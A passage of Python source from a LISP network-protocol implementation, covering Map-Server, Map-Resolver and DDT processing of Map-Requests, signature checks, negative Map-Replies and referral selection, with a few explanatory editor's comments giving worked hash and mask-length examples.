mr_sport, ecm_source):
#
# Look up EID in site cache. If we find it and it has registered for
# proxy-replying, this map-server will send the Map-Reply. Otherwise,
# send to one of the ETRs at the registered site.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
itr_rloc = map_request.itr_rlocs[0]
xtr_id = map_request.xtr_id
nonce = map_request.nonce
action = LISP_NO_ACTION
pubsub = map_request.subscribe_bit
#
# Check if we are verifying Map-Request signatures. If so, do a mapping
# database lookup on the source-EID to get public-key.
#
sig_good = True
is_crypto_hash = (lisp_get_eid_hash(eid) != None)
if (is_crypto_hash):
sig = map_request.map_request_signature
if (sig == None):
sig_good = False
lprint(("EID-crypto-hash signature verification {}, " + \
"no signature found").format(bold("failed", False)))
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. An ITR usually doesn't
# send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If the request is for a non-crypto-EID, signatures are configured to
# be required, and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not want to return a coarser EID-prefix to the Map-Resolver.
# The AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in the TTL field of the
# EID-record, set the high-order bit in the ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And whether we should drop the
# Map-Request and return a negative Map-Reply.
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell a spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
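#
# Editor's note on the ETR selection above: the Map-Server spreads
# Map-Requests across the registered RLOC-set by XORing the source-EID
# with the target-EID (hash_address(), per the comment on
# lisp_find_negative_mask_len() below) and taking the result modulo the
# RLOC count. With hypothetical 32-bit values,
# 0x0a010101 ^ 0x0a020202 = 0x00030303, and 0x00030303 % 3 == 0, so the
# first of three registered ETRs is chosen; the same EID pair always
# maps to the same ETR.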
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from a Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# The EID matched an auth-prefix entry, which has no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different.
# Then count how many bits from the left that bit position is. That is the
# new mask-length. Compare it to the neg-prefix mask-length we have found
# so far. If the new one is longer than the stored one, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
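#
# Editor's worked example: for eid 10.1.1.1 and entry_prefix 10.1.0.0,
# the XOR is 0x00000101. Scanning from the left, the first set bit is
# found at mask_len 23 (bit_test = 1 << (32 - 23 - 1) = 0x100), so 23
# becomes the candidate mask-length; the longest candidate seen across
# all walked entries wins.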
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that does NOT match any configured
# site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the
# host-based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that does NOT match any configured
# site EIDs.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporarily return the requested prefix until we have
# lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group = group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get the referral-node we sent the Map-Request to last time. We need
# to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Referrals have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
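#
# Editor's illustration of the selection above: referral-nodes with
# priorities 1, 1, and 2 (all up) reduce ref_set to the two priority-1
# nodes. The XOR hash of dest_eid and source_eid modulo 2 then picks
# one deterministically, so a given EID pair always lands on the same
# referral-node while different pairs spread the load.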
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# The caller may want us to use the root versus a best-match lookup. We
# only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by a Map-Resolver from an ITR. We need to
# forward this Map-Request to the longest matched referral from the
# referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process a received Map-Request as a Map-Server, Map-Resolver, DDT node,
# or ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record,
# like those from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, nil = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
